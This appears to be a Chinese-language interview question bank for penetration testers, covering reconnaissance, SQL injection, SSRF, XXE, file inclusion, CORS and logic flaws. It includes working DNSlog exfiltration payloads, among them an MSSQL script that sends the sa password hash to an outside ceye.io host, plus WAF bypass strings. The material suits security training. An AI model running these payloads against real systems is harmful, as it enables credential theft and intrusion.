一、请说出你常用信息收集方式,收集哪些信息
1、收集目标端口开放情况,可以用nmap、fofa等,根据开放的端口,判断目标开放了哪些服务,从而针对性地进行渗透。
2、目录扫描,可能存在git、svn源码泄露,扫出数据库、网站备份文件,phpinfo探针等。dirscan、dirbuster、御剑等。
3、收集whois信息,备案信息,对于组成社工字段非常有帮助,提高爆破成功率
4、网站指纹信息,判断目标是否使用某cms搭建,可根据历史漏洞进行渗透,或者下载源码直接审计识别网站是否存在waf,看下robots文件等,判断对方使用什么数据库,脚本语言,中间件信息,操作系统信息等。
5、收集子域名、旁站、C段信息,一般主站防御做的比较好,可以通过子域名入手,可以通过子域名挖掘机,在线查询,例如github,ssl证书等
6、如果对方有cdn,还需要绕过,例如多地ping,国外访问,dns历史解析记录,ssl证书,子域名ip等
7、利用搜素引擎,github,fofa,shadan等,帮助我们进行信息收集,例如利用google语法搜素网站后台,github查询有没有源码泄露,账号邮箱信息等。
二、做了CDN的网站如何获取真实IP
多地ping,国外访问,dns历史解析记录,ssl证书,子域名ip,ssrf漏洞,邮件服务器,nslookup
三、SQL bypass 时有哪些可以替换空格
%0A、%09、%0C、%0D、%20、%A0、/**/、+、/*!xxxxx*/
四、DNS log 盲注有了解过吗?为什么要用DNS log来盲注?如何利用?
有,因为盲注无回显,通过 DNSLOG 可以外带结果到 dnslog 平台,从而达到获取信息目的。
1、mysql是通过 load_file()函数进行 dnslog 盲注
Payload:load_file(concat('\\\\',(select database()),'.xxx.ceye.io\\sql'))
2、mssql
DECLARE @host varchar(1024);
SELECT @host=(SELECT TOP 1
master.dbo.fn_varbintohexstr(password_hash)
FROM sys.sql_logins WHERE name='sa')
+'.ip.port.b182oj.ceye.io';
EXEC('master.xp_dirtree
"\\'+@host+'\foobar$'");
其他的再ceye平台都有实例payload
五、SSRF漏洞是什么?能用来干嘛?能利用哪些协议?
服务端请求伪造,能用来探测内网端口,服务信息,攻击内网资源,例如配合redis写shell,反弹shell,ssh密钥登陆等。
可利用得协议有sftp、ftp、gopher、http、dict、file
六、文件包含漏洞了解吗?有哪些利用姿势能getshell的?最近爆出的tomcat aip协议包含漏洞了解过吗?
有、可以配合图片马getshell、包含各类日志文件getshell、包含session。
新出的漏洞了解过,也复现过,实战也提交过漏洞
攻击者通过Aip协议端口利用该漏洞进行文件读取或包含Tomcat上的所有webapp目录下的任意文件,如:webapp配置文件、源代码等
七、包含漏洞有哪些绕过限制的方式?
../跳目录
./长度截断,linux下4096字节时会达到最大值,在windows下是256字节
00 截断
url编码,可多次编码
八、XXE漏洞是什么?无回显XXE该如何利用?
XML外部实体注入漏洞,可通过引入外部实体进行文件读取,造成敏感信息泄露,例如网站源码、配置文件、linux的passwd和shadow文件,还可以进行端口探测
无回显的xxe可配合dnslog平台
九、CSRF漏洞是什么?有了解过吗?如何防御?
跨站请求伪造,主要是因为操作没有做限制,导致可利用他人身份进行恶意请求。
防御:添加token、限制referer
十、mysql注入写webshell方式?需要什么条件?
通过 into oufile、into dumpfile函数进行写 webshell
权限足够高,尽量具有root 权限,secure_file_priv 不为具体的null,需要为空
十一、如何突破注入时字符被转义?
看能否使用宽字节注入、编码尝试绕过
十二、反序列化漏洞了解过吗?简单说下php反序列化漏洞
了解过,例如weblogic的反序列化漏洞、shiro反序列化、fasjson反序列化漏洞等
php反序列化漏洞,简单来说就是字符串转换为对象的时候,攻击者传入恶意字符串,导致造成恶意攻击
十三、什么是浏览器同源策略?cors跨域劫持漏洞有了解过吗?请简单说下
两个页面的协议,端口、和域名都相同
了解过,就是orgin头,可以指定为我们输入的域名
Access-Control-Allow-Origin:我们指定的域名
Access-Control-Allow-Credentials:true
这样就可以构造poc,进行跨域劫持敏感信息
可以配合burp,让每次请求都带上orgin头,查看响应信息是否返回
Access-Control-Allow-Origin:我们指定的域名
Access-Control-Allow-Credentials:true
如果是,大概率存在漏洞
十四、请说出逻辑漏洞常出现的场景,如何修复?
重置密码功能,通常造成任意用户密码重置。
商城网站,出现支付逻辑漏洞、个人信息处可尝试越权查看或修改其他用户信息
修复,做好鉴权,不随意信任用户的输入,敏感操作需要加入token或者验证
十五、请你说说最近渗透印象比较深的网站 或者 挖掘到的某个漏洞过程
挖某个网站的时候,重置密码功能前几步验证都做好了鉴权,但是最后一步提交的时候、抓了包,发现里面有个关键性参数是uid和验证码,本以为是绑定,无法修改的,但是尝试将验证码参数删除、把uid改成另一个测试账号时,发现依然200提示修改成功,然后另一个测试用户登陆,用刚才修改的密码。发现无法登陆,以为是没成功,经过测试,在某个方式找回密码时,发现可以枚举uid,这样就可以通过这个漏洞,导致网站用户全部无法登陆,危害还是很大的。